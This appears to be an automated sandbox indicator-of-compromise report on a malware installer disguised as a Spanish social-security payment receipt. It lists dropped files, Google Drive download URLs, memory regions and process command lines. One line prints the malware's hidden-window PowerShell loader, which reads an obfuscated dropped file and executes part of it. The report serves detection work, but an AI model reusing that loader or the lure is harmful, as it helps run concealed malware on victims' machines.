IOC Report
JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exe

loading gif

Files

File Path
Type
Category
Malicious
JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Intelligentes.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\nonwavering.Dor
ASCII text, with very long lines (53355), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\Intelligentes.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32vx2rfm.k1s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyqz0mjf.1nb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\nsm4FAD.tmp
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Easterlies.bin
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Tingent\Mesaconate\Ungkarlenes\Frkkest\Wawa.gim
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\dataformat.una
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\disobeyal.gua
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\morey.sul
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\naboens.eme
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\nanocuries.zab
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\Squires12.ret
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\bankrs.sab
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\beagle.cop
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\bepat.rom
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\commonage.gun
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\omnivorousnesses\Luftangrebenes\Uforstligt\Earthshaker58\perlustrator.svl
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\omnivorousnesses\Luftangrebenes\Uforstligt\Earthshaker58\restocked.tem
GTA audio index data (SDT)
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\omnivorousnesses\Luftangrebenes\Uforstligt\Earthshaker58\rustyish.dit
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\unrhyming\Ejendomsretten.cab
data
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\unrhyming\Kvantumsrabats162.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\unrhyming\Ridehest87.uve
data
dropped
There are 16 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exe
"C:\Users\user\Desktop\JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -windowstyle hidden "$Riparious=Get-Content 'C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\nonwavering.Dor';$Craunching=$Riparious.SubString(53285,3);.$Craunching($Riparious)"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
malicious
C:\Users\user\AppData\Local\Temp\Intelligentes.exe
"C:\Users\user\AppData\Local\Temp\Intelligentes.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.google.com
unknown
https://drive.google.com/F6EB83BEBC2FBA90920B1
unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
unknown
https://drive.google.com/=J
unknown
https://drive.google.com/
unknown
https://drive.google.com/ertificates
unknown
https://drive.google.com/S
unknown
https://drive.google.com/s
unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
unknown
https://apis.googl
unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
unknown
http://akeo.ie)4
unknown
http://www.ftp.ftp://ftp.gopher.
unknown
https://drive.usercontent.google.com/
unknown
https://apis.google.com
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://drive.google.com/MJo
unknown
https://apis.E
unknown
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
172.253.122.113
drive.usercontent.google.com
172.253.122.132

IPs

IP
Domain
Country
Malicious
172.253.122.132
drive.usercontent.google.com
United States
172.253.122.113
drive.google.com
United States

Memdumps

Base Address
Regiontype
Protect
Malicious
359E000
remote allocation
page execute and read and write
malicious
96000
stack
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
449000
unkown
page readonly
5D70000
heap
page read and write
408000
unkown
page readonly
5D6F000
heap
page read and write
5D70000
heap
page read and write
5D76000
heap
page read and write
5D69000
heap
page read and write
358E000
stack
page read and write
5D69000
heap
page read and write
5D6D000
heap
page read and write
5D1F000
heap
page read and write
5D1F000
heap
page read and write
5D73000
heap
page read and write
213DF000
stack
page read and write
5D6D000
heap
page read and write
5D6D000
heap
page read and write
5D6F000
heap
page read and write
401000
unkown
page execute read
5EC000
unkown
page execute read
5D0D000
heap
page read and write
5D6D000
heap
page read and write
5D68000
heap
page read and write
5D6D000
heap
page read and write
61E000
stack
page read and write
5D6F000
heap
page read and write
5D6D000
heap
page read and write
5D6D000
heap
page read and write
5D68000
heap
page read and write
5D69000
heap
page read and write
5D26000
heap
page read and write
5D6A000
heap
page read and write
5D70000
heap
page read and write
5D76000
heap
page read and write
5D66000
heap
page read and write
5D0D000
heap
page read and write
3330000
heap
page read and write
5D66000
heap
page read and write
20E20000
direct allocation
page read and write
5D66000
heap
page read and write
5D6C000
heap
page read and write
5D70000
heap
page read and write
5D6C000
heap
page read and write
5D70000
heap
page read and write
5F0000
unkown
page execute read
354E000
unkown
page read and write
5D6D000
heap
page read and write
307D000
stack
page read and write
5F2000
unkown
page execute read
5D77000
heap
page read and write
5D07000
heap
page read and write
5D6D000
heap
page read and write
5D6D000
heap
page read and write
5D6B000
heap
page read and write
5D70000
heap
page read and write
5D73000
heap
page read and write
5D70000
heap
page read and write
5D66000
heap
page read and write
5D66000
heap
page read and write
5D70000
heap
page read and write
40C000
unkown
page read and write
5D25000
heap
page read and write
5D07000
heap
page read and write
5D6D000
heap
page read and write
5CA0000
direct allocation
page read and write
5D76000
heap
page read and write
5D6D000
heap
page read and write
5D72000
heap
page read and write
5D23000
heap
page read and write
5D73000
heap
page read and write
400000
unkown
page readonly
5D1A000
heap
page read and write
5D76000
heap
page read and write
5D1B000
heap
page read and write
5D6F000
heap
page read and write
3F9E000
remote allocation
page execute and read and write
449000
unkown
page readonly
260E000
stack
page read and write
5D6D000
heap
page read and write
2156F000
stack
page read and write
5D66000
heap
page read and write
5D25000
heap
page read and write
5D6D000
heap
page read and write
5D6D000
heap
page read and write
648000
heap
page read and write
5D07000
heap
page read and write
5D6C000
heap
page read and write
5D66000
heap
page read and write
5C90000
direct allocation
page read and write
5D77000
heap
page read and write
539E000
remote allocation
page execute and read and write
2139E000
stack
page read and write
427000
unkown
page read and write
5D69000
heap
page read and write
5D66000
heap
page read and write
5D72000
heap
page read and write
67E000
heap
page read and write
5D6D000
heap
page read and write
5D6C000
heap
page read and write
5D66000
heap
page read and write
5D66000
heap
page read and write
5D76000
heap
page read and write
5D6F000
heap
page read and write
3170000
heap
page read and write
5D70000
heap
page read and write
5D66000
heap
page read and write
686000
heap
page read and write
5D73000
heap
page read and write
3740000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D70000
heap
page read and write
5D63000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D6A000
heap
page read and write
5D6D000
heap
page read and write
31E0000
heap
page read and write
5D69000
heap
page read and write
5D1D000
heap
page read and write
5D73000
heap
page read and write
5D07000
heap
page read and write
5D73000
heap
page read and write
5EE000
unkown
page execute read
5D66000
heap
page read and write
5D66000
heap
page read and write
5D69000
heap
page read and write
5D76000
heap
page read and write
3750000
heap
page read and write
5D73000
heap
page read and write
5D73000
heap
page read and write
76C0000
trusted library allocation
page read and write
5D6D000
heap
page read and write
5D6A000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
42F000
unkown
page read and write
5D6F000
heap
page read and write
5D6D000
heap
page read and write
5D6D000
heap
page read and write
40A000
unkown
page read and write
5D6D000
heap
page read and write
5D69000
heap
page read and write
2B9E000
remote allocation
page execute and read and write
2180000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5E8000
unkown
page execute read
5D70000
heap
page read and write
5D6D000
heap
page read and write
5D68000
heap
page read and write
2148E000
stack
page read and write
5D6D000
heap
page read and write
5D25000
heap
page read and write
5D76000
heap
page read and write
5D6F000
heap
page read and write
5D70000
heap
page read and write
5D6D000
heap
page read and write
499E000
remote allocation
page execute and read and write
270F000
stack
page read and write
5D66000
heap
page read and write
5D77000
heap
page read and write
20DC0000
direct allocation
page read and write
5D1B000
heap
page read and write
5D70000
heap
page read and write
5D6A000
heap
page read and write
5D1A000
heap
page read and write
5D70000
heap
page read and write
6090000
heap
page read and write
5D76000
heap
page read and write
626000
unkown
page execute read
5D77000
heap
page read and write
5E4000
unkown
page execute read
5D77000
heap
page read and write
5D6D000
heap
page read and write
5D6A000
heap
page read and write
5D6B000
heap
page read and write
368F000
stack
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D6F000
heap
page read and write
5D70000
heap
page read and write
5D70000
heap
page read and write
2842000
heap
page read and write
5D76000
heap
page read and write
5D6D000
heap
page read and write
5D72000
heap
page read and write
5D6D000
heap
page read and write
5D6A000
heap
page read and write
40A000
unkown
page write copy
5D73000
heap
page read and write
5D26000
heap
page read and write
630000
heap
page read and write
5D73000
heap
page read and write
400000
unkown
page readonly
5D73000
heap
page read and write
5D25000
heap
page read and write
5C30000
direct allocation
page read and write
5D66000
heap
page read and write
5D6A000
heap
page read and write
5D6D000
heap
page read and write
401000
unkown
page execute read
5D0D000
heap
page read and write
5D70000
heap
page read and write
5D6A000
heap
page read and write
5D6D000
heap
page read and write
20E10000
direct allocation
page read and write
5E6000
unkown
page execute read
5D73000
heap
page read and write
5D70000
heap
page read and write
5D66000
heap
page read and write
649000
unkown
page execute read
5D73000
heap
page read and write
5D73000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
5D6D000
heap
page read and write
5D66000
heap
page read and write
5D76000
heap
page read and write
5D6D000
heap
page read and write
5D66000
heap
page read and write
5EA000
unkown
page execute read
2740000
heap
page read and write
5D76000
heap
page read and write
5D77000
heap
page read and write
5D73000
heap
page read and write
20DF0000
direct allocation
page read and write
401000
unkown
page execute read
5D73000
heap
page read and write
5C45000
heap
page read and write
5D6D000
heap
page read and write
5D66000
heap
page read and write
1660000
remote allocation
page execute and read and write
5D73000
heap
page read and write
408000
unkown
page readonly
5D66000
heap
page read and write
5D70000
heap
page read and write
25CF000
stack
page read and write
212DD000
stack
page read and write
5D6B000
heap
page read and write
5D62000
heap
page read and write
5D73000
heap
page read and write
5CB0000
heap
page read and write
5D66000
heap
page read and write
5D6F000
heap
page read and write
5D66000
heap
page read and write
5D73000
heap
page read and write
5D76000
heap
page read and write
5D70000
heap
page read and write
9C000
stack
page read and write
5D6F000
heap
page read and write
5D23000
heap
page read and write
5D6F000
heap
page read and write
635000
heap
page read and write
5D76000
heap
page read and write
5D6F000
heap
page read and write
5D77000
heap
page read and write
20F0000
heap
page read and write
5D6F000
heap
page read and write
179E000
remote allocation
page execute and read and write
640000
heap
page read and write
5D66000
heap
page read and write
5D76000
heap
page read and write
5D6F000
heap
page read and write
5D0D000
heap
page read and write
214F0000
remote allocation
page read and write
5D73000
heap
page read and write
5D70000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
5D70000
heap
page read and write
5D68000
heap
page read and write
5D6D000
heap
page read and write
5D6D000
heap
page read and write
5D6C000
heap
page read and write
4D0000
heap
page read and write
5D6A000
heap
page read and write
213F0000
heap
page read and write
5D66000
heap
page read and write
5D63000
heap
page read and write
5D76000
heap
page read and write
5D07000
heap
page read and write
5D77000
heap
page read and write
317D000
stack
page read and write
5D6F000
heap
page read and write
5D62000
heap
page read and write
5D77000
heap
page read and write
5D69000
heap
page read and write
2144E000
stack
page read and write
5D73000
heap
page read and write
20E00000
direct allocation
page read and write
5D66000
heap
page read and write
5D1A000
heap
page read and write
5D6B000
heap
page read and write
5D71000
heap
page read and write
5D76000
heap
page read and write
4CE000
stack
page read and write
19A000
stack
page read and write
5D6A000
heap
page read and write
2131D000
stack
page read and write
5D6F000
heap
page read and write
435000
unkown
page read and write
20E40000
direct allocation
page read and write
5D6D000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D70000
heap
page read and write
5D62000
heap
page read and write
5D6D000
heap
page read and write
500000
heap
page read and write
5D76000
heap
page read and write
5D6D000
heap
page read and write
5D70000
heap
page read and write
5D6D000
heap
page read and write
5D6C000
heap
page read and write
5D70000
heap
page read and write
5D77000
heap
page read and write
5D70000
heap
page read and write
5D68000
heap
page read and write
4F0000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D6F000
heap
page read and write
5D77000
heap
page read and write
5D6A000
heap
page read and write
5D70000
heap
page read and write
5D69000
heap
page read and write
5D70000
heap
page read and write
5D6D000
heap
page read and write
5D6B000
heap
page read and write
5D6F000
heap
page read and write
5D6A000
heap
page read and write
5D66000
heap
page read and write
5CF4000
heap
page read and write
5BC0000
heap
page read and write
5D66000
heap
page read and write
5D24000
heap
page read and write
5D66000
heap
page read and write
5D70000
heap
page read and write
5D69000
heap
page read and write
5D6D000
heap
page read and write
5D76000
heap
page read and write
446000
unkown
page read and write
4F4000
heap
page read and write
5D6D000
heap
page read and write
5D6F000
heap
page read and write
5D76000
heap
page read and write
5D77000
heap
page read and write
5D6D000
heap
page read and write
2152E000
stack
page read and write
5D66000
heap
page read and write
5D69000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
5D70000
heap
page read and write
5D73000
heap
page read and write
2750000
heap
page read and write
5D66000
heap
page read and write
3200000
heap
page read and write
5D6A000
heap
page read and write
5D66000
heap
page read and write
5D66000
heap
page read and write
5D72000
heap
page read and write
5D0D000
heap
page read and write
5D0D000
heap
page read and write
5D1F000
heap
page read and write
320B000
heap
page read and write
5D6A000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D6D000
heap
page read and write
401000
unkown
page execute read
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D66000
heap
page read and write
5D77000
heap
page read and write
5D6D000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D70000
heap
page read and write
5C10000
heap
page read and write
3770000
heap
page read and write
5D6A000
heap
page read and write
5D66000
heap
page read and write
20E30000
direct allocation
page read and write
5D73000
heap
page read and write
5D70000
heap
page read and write
5D73000
heap
page read and write
5D73000
heap
page read and write
5D76000
heap
page read and write
5D6B000
heap
page read and write
214E000
stack
page read and write
5D62000
heap
page read and write
5D77000
heap
page read and write
5D70000
heap
page read and write
5D70000
heap
page read and write
5D70000
heap
page read and write
5D70000
heap
page read and write
93F000
stack
page read and write
5D6A000
heap
page read and write
5D6D000
heap
page read and write
5D60000
heap
page read and write
5D6C000
heap
page read and write
5D73000
heap
page read and write
20DD0000
direct allocation
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D69000
heap
page read and write
5C40000
heap
page read and write
5D6B000
heap
page read and write
5D66000
heap
page read and write
5D6B000
heap
page read and write
5D0D000
heap
page read and write
5D26000
heap
page read and write
5D6D000
heap
page read and write
5D69000
heap
page read and write
5D1D000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
400000
unkown
page readonly
5D6F000
heap
page read and write
5D73000
heap
page read and write
19B000
stack
page read and write
5D1B000
heap
page read and write
5D6A000
heap
page read and write
5D66000
heap
page read and write
5D66000
heap
page read and write
5D6D000
heap
page read and write
5D69000
heap
page read and write
5D6F000
heap
page read and write
40A000
unkown
page write copy
31F0000
heap
page read and write
5D6B000
heap
page read and write
42B000
unkown
page read and write
5D66000
heap
page read and write
5D73000
heap
page read and write
5D76000
heap
page read and write
5D6F000
heap
page read and write
5D6D000
heap
page read and write
5D73000
heap
page read and write
5D63000
heap
page read and write
20DE0000
direct allocation
page read and write
5D71000
heap
page read and write
5D66000
heap
page read and write
214F0000
remote allocation
page read and write
5D6D000
heap
page read and write
5D66000
heap
page read and write
5D07000
heap
page read and write
83F000
stack
page read and write
5D25000
heap
page read and write
5D77000
heap
page read and write
505000
heap
page read and write
219E000
remote allocation
page execute and read and write
5D6D000
heap
page read and write
5D77000
heap
page read and write
5D68000
heap
page read and write
5CB8000
heap
page read and write
5D68000
heap
page read and write
408000
unkown
page readonly
5D70000
heap
page read and write
480000
heap
page read and write
5D6D000
heap
page read and write
214F0000
remote allocation
page read and write
5D6D000
heap
page read and write
344E000
unkown
page read and write
449000
unkown
page readonly
5D6A000
heap
page read and write
3180000
heap
page read and write
5D66000
heap
page read and write
5D66000
heap
page read and write
There are 473 hidden memdumps, click here to show them.